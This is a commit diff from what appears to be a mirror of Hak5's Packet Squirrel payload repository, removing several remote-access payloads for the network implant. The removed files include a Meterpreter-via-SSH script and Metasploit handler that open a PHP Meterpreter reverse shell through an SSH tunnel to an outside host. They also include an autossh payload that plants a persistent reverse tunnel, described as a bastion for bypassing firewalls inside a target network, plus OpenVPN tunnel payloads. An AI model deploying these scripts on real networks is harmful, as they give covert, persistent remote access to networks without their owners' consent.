HAK5/packetsquirrel-payloads
1
0
Fork 0
mirror of https://github.com/hak5/packetsquirrel-payloads.git synced 2025-12-19 09:48:47 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update repos for Packet Squirrel Mk 2 release

Browse Source
This commit is contained in:
Mike Kershaw / Dragorn
2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

50
payloads/library/remote-access/Meterpreter-via-SSH/README.md
View File

@@ -1,50 +0,0 @@
# Meterpreter-via-SSH
## Overview
This payload starts Packet Squirrel in NAT mode and awaits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over said tunnel.
The intent is to get a meterpreter shell on a target network in a way that hides meterpreter network traffic behind legitimate SSH activity.
## Operational Design Considerations
* Payload remains silent on the network until user presses the button.
* Payload stops the SSH connection if meterpreter shell fails.
* Payload always keeps only 1 copy of SSH+meterpreter processes running (even if the button is pressed many times).
## Getting Started
Copy the payload to Packet Squirrel into desired switch folder, then edit the script to configure your server options:
* SSH_USER - username on remote SSH server
* SSH_HOST - ip/domain of remote SSH server
In case you choose to change the default meterpreter port, don't forget to change it on the metasploit side as well.
* MSF_PORT - port of meterpreter listener
### Generate SSH Key on Squirrel
You will likely have to generate an ssh key-pair (use default location and empty password) on your Packet Squirrel:
```
root@squirrel:~# ssh-keygen
```
### Allow Squirrel on SSH Server
Then you will need to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH server authorized file:
```
user@server:~# mkdir ~/.ssh
user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys
```
### Run Metasploit with Resource
```
msf@server:~# msfconsole -r server.rc
```
## LED Definitions
1. Configure NETMODE
* Solid Magenta
2. Connect to SSH Server
* SUCCESS - Blink Amber 5 Times
* FAIL - Blink Red 2 Times
3. Launch meterpreter
* SUCCESS - Blink Cyan 1 Time
* FAIL - Blink Red 1 Time
## Hardening Recommendations
1. Use an account with limited privileges for SSH access on the server.
2. Use a dedicated account for Packet Squirrel device (audit usage with SSH access logs).
3. Disable PasswordAuthentication in sshd_config on the server.

74
payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
View File

@@ -1,74 +0,0 @@
#!/bin/bash
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus
# Version: 1.0
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 1.2
#
# LED State Descriptions
# Magenta Solid - Configuring NETMODE
# LED OFF - Waiting for BUTTON
# Red Blink 2 Times - SSH Connection Failed
# Amber Blink 5 Times - SSH Connection Successful
# Red Blink 1 Time - Meterpreter Failed
# Cyan Blink 1 Time - Meterpreter Successful
SSH_USER="username"
SSH_HOST="hostname"
MSF_PORT=31337
function start()
{
LED SETUP
NETMODE NAT
sleep 5
LED OFF
# Wait until BUTTON is pressed
while true
do
NO_LED=1 BUTTON && {
# close any existing meterpreter and SSH connections
kill `pgrep php` 2> /dev/null
kill `pgrep -x ssh` 2> /dev/null
sleep 2
# Establish connection to remote SSH server
ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
# Check if SSH connection worked
if [ -z `pgrep -x ssh` ]
then
LED FAIL
sleep 5
LED OFF
continue
else
LED STAGE1
sleep 5
fi
# Start meterpreter reverse shell
meterpreter-php 127.0.0.1 $MSF_PORT &
sleep 2
# Check if meterpreter shell started
if [ -z `pgrep php` ]
then
# Close SSH connection because meterpreter failed
kill `pgrep -x ssh` 2> /dev/null
LED FAIL
else
LED SPECIAL
fi
sleep 1
LED OFF
}
done
}
# Start the payload
start &

9
payloads/library/remote-access/Meterpreter-via-SSH/server.rc
View File

@@ -1,9 +0,0 @@
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set EnableContextEncoding false
set DisablePayloadHandler false
set ExitOnSession false
set ListenerTimeout 0
set LHOST 127.0.0.1
set LPORT 31337
run -j

88
payloads/library/remote-access/SSH-remote-access/payload.sh
View File

@@ -1,88 +0,0 @@
#!/bin/bash
# Title: SSH Remote Management Tool for Packet Squirrel
# Description: Makes packet Squirrel directly accessible via SSH on a remote server
# Author: BlackPropaganda
# Version: 0.5
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 3.2
#
# LED State Descriptions
# Magenta Solid - SSH connecting
# Amber - SSH connection attempted
#
NETMODE NAT
LED SETUP
# no pass needed, headless mode required so RSA key file is used.
#
# generate the key by running the following command in the /root/.ssh/ folder:
# 'ssh -t rsa -b 2048 -f id_rsa'
#
# To ensure that this works as intended, the user will have to connect to this host at least once
# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list
# of trusted hosts.
#
# If this step fails, the payload will fail.
autossh_host="root@<remote server IP>"
autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
autossh_port="22"
autossh_remoteport="2222"
autossh_localport="22"
switch=SWITCH
interface="eth1"
if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
LED FAIL
exit 1
fi
#
# For the life of me I couldn't get SSH to work. The funny thing was it would
# run in the shell command, but not in the payload. The following solution
# implements a tool called autossh which ensures nothing funky happens to the
# connection.
#
# the following was ripped from dark_pyrro (the legend) via:
# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
#
# waiting until eth1 acquires IP address
while ! ifconfig "$interface" | grep "inet addr"; do sleep 1; done
echo -e "starting server.\n" >> /root/payloads/$switch/debug.txt
# starting sshd and waiting for process to start
/etc/init.d/sshd start
until netstat -tulpn | grep -qi "sshd"
do
sleep 1
done
# stopping autossh
/etc/init.d/autossh stop
#
# Much like the SSH server, AutoSSH has a configuration file. This
# needs to be configured to support this connection as a daemon.
#
# Create a "fresh template" for the autossh configuration
# Starting with an empty autossh file in /etc/config
# isn't something that uci is very fond of
echo "config autossh" > /etc/config/autossh
echo " option ssh" >> /etc/config/autossh
echo " option enabled" >> /etc/config/autossh
# UCI configuration and commission
uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
uci set autossh.@autossh[0].enabled="1"
uci commit autossh
LED ATTACK
# starting autossh
/etc/init.d/autossh start

117
payloads/library/remote-access/SSH-remote-access/readme.md
View File

@@ -1,117 +0,0 @@
#Squirrel SSH Remote Access
____
### Concept:
The Packet Squirrel is a powerful tool for network implants. One operational issue with an implant of this nature
is that it cannot function beyond the pre-programmed payloads.
Using techniques like Dynamic Port Forwarding (SOCKS/SSH), this payload allows the user to create a Bastion
inside a target network. This bastion allows the user to bypass less sophisticated firewall configurations,
like so:
Remote SSH Host Target Behind Firewall
___ ___
/ /| / /|
/__/ | <====[ X ]====> /__/ |
|--| | |--| |
| *|/ | *|/
Remote SSH Host Packet Squirrel Target Behind Firewall
___ (inside LAN) ___
/ /| _______ / /|
/__/ | <=====> /______/`) <=====> /__/ |
|--| | (__[__]_)/ |--| |
| *|/ | *|/
This assumes SSH is not denied by default on the targets' outbound firewall configuration. One limitation
is that this tool is susceptible to detection via NIDS. Multiple outbound connections and high-bandwidth
utilization raises suspicion of potential attack, however this is only a concern for more sophisticated
targets.
---
# SSH Server Configuration
---
A good background for this payload is this video that Darren made doing this on the Lan Turtle:
https://www.youtube.com/watch?v=uIdvvrDrRj0
This payload requires an SSH server be operational somewhere on the internet. Typically, a password
is required to acquire shell access to these servers. This is a pain if you're trying to do everything
automatically, so openssh allows for cryptographic pubkey authentication. More on this here:
https://www.redhat.com/sysadmin/key-based-authentication-ssh
Firstly, for security reasons you may want to create a user account specifically for this payload.
The reasoning is if the squirrel is lost or stolen someone has a key to your server, to mitigate this
threat, if the squirrel is lost in a contested environment, deleting the user will block access.
On most linux systems, the command is either 'useradd' or 'adduser', but this is distro specific.
After you create the user and are prompted with the new user password, bear in mind to save it because
you will need it during the pubkey installation process.
useradd squirrel
Password-less authentication to a specific user account can be obtained by first enabling this in
the openssh configuration file. This file is most commonly found in /etc/ssh/sshd_config and changing the line
'PubkeyAuthentication no' to 'PubkeyAuthentication yes'. Or, if your version does not have this,
you can append this line near the top of the configuration file under the authentication category, like so:
# Authentication:
#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
Also ensure that your AuthorizedKeysFile is present in your new users home directory.
Secondly, on an SSH client, you will need to generate the key. For the sake of demonstration,
we will use RSA 2048-bit keys, but you can use any of the following, such as dsa, ecdsa, ed25519 and rsa.
Keep in mind that the squirrel is a tiny computer and may have trouble with higher-bit symmetrical keys
like RSA 4096. If you are noticing performance problems, ecdsa and ed25519 are 'as secure' as RSA but require
less intensive computations to encrypt and decrypt data. Choose your poison.
here's the command to generate a key and place it in the current working directory. When you create it,
it's best if you don't leave a password since this file will need to be readable without your input.
so when prompted for a password just press 'enter' in the terminal. Note that this will create two files.
First, the private key, then the pubkey.
ssh-keygen -t rsa -b 4096 -f id_rsa
After we generate the SSH key, we need to install it on our remote SSH server. We can do this by entering the following
into a terminal in the same directory. This will prompt the user for the password.
ssh-copy-id -i id_rsa squirrel@<ssh_server_ip>
To test the connection, you can enter this into the terminal:
ssh -i id_rsa squirrel@<ssh_server_ip>
After confirming that the key-based authentication works, now it's time to configure the squirrel.
In arming mode, secure copy the key to the /root/.ssh/ directory in the squirrel by running:
scp id_rsa root@172.16.32.1:/root/.ssh/id_rsa
You will be prompted for a password and then the file will be uploaded.
Then, you need to connect to the ssh server at least once so the squirrel adds this server to the list
of known_hosts. More on this on the ssh man page. While in the squirrel, execute this:
ssh -i /root/.ssh/id_rsa squirrel@<ssh_server_ip>
you will be prompted whether or not to add the host signature to known hosts, enter 'y'. Then,
configure the payload to use your ssh user and IP address, then the payload should make the squirrels
ssh server available at 127.0.0.1 on port 2222 on the ssh server.
Goes without saying, but use at your own risk. Don't do bad things.

61
payloads/library/remote-access/Togglable-VPN/payload.sh
View File

@@ -1,61 +0,0 @@
#!/bin/bash
#
# Title: Togglable-VPN
# Description: Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server,
# or if the button is pressed, send traffic from the clients through said tunnel.
# This way no editing of the payload is required to switch modes.
# On boot the Squirrel will wait for a button press for 10 seconds, if it is pressed, the VPN will
# launch in client mode, if it is not pressed in the interval it will launch in remote-access mode.
# Author: DannyK999
# Credit: Credit to Hak5 for original VPN payload.
# Version: 1.0
# Category: remote-access
# Target: Any
# Net Mode: BRIDGE, VPN
DNS_SERVER="8.8.8.8"
# Cheap hack to set the DNS server
function setdns() {
while true
do
[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
}
sleep 5
done
}
function start() {
LED SETUP
DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# Check for button press to see whether to set NETMODE to BRIDGE or VPN
# and wait 3 seconds to ensure that things can settle
BUTTON 10s && {
/usr/bin/NETMODE VPN
} || {
/usr/bin/NETMODE BRIDGE
}
sleep 3
# Make OpenVPN use the local configuration
uci set openvpn.vpn.config="${DIR}/config.ovpn"
uci commit
# Start the OpenVPN server in the background
/etc/init.d/openvpn start
# Start SSH Server
/etc/init.d/sshd start &
# Set DNS server
setdns &
LED ATTACK
}
# Start the payload
start &

0
payloads/library/remote-access/openvpn/config.ovpn
View File

62
payloads/library/remote-access/openvpn/payload.sh
View File

@@ -1,62 +0,0 @@
#!/bin/bash
#
# Title: OpenVPN
# Description: Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel.
# Author: Hak5
# Version: 1.0
# Category: remote-access
# Target: Any
# Net Mode: BRIDGE, VPN
# Set to 1 to allow clients to use the VPN
FOR_CLIENTS=0
DNS_SERVER="8.8.8.8"
# Cheap hack to set the DNS server
function setdns() {
while true
do
[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
}
sleep 5
done
}
function start() {
LED SETUP
DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# Update factory default payload
cp ${DIR}/payload.sh /root/payloads/switch3/payload.sh
# Set NETMODE to BRIDGE and wait 3 seconds
# to ensure that things can settle
[[ "$FOR_CLIENTS" == "1" ]] && {
/usr/bin/NETMODE VPN
} || {
/usr/bin/NETMODE BRIDGE
}
sleep 3
# Make OpenVPN use the local configuration
uci set openvpn.vpn.config="${DIR}/config.ovpn"
uci commit
# Start the OpenVPN server in the background
/etc/init.d/openvpn start
# Start SSH Server
/etc/init.d/sshd start &
# Set DNS server
setdns &
LED ATTACK
}
# Start the payload
start &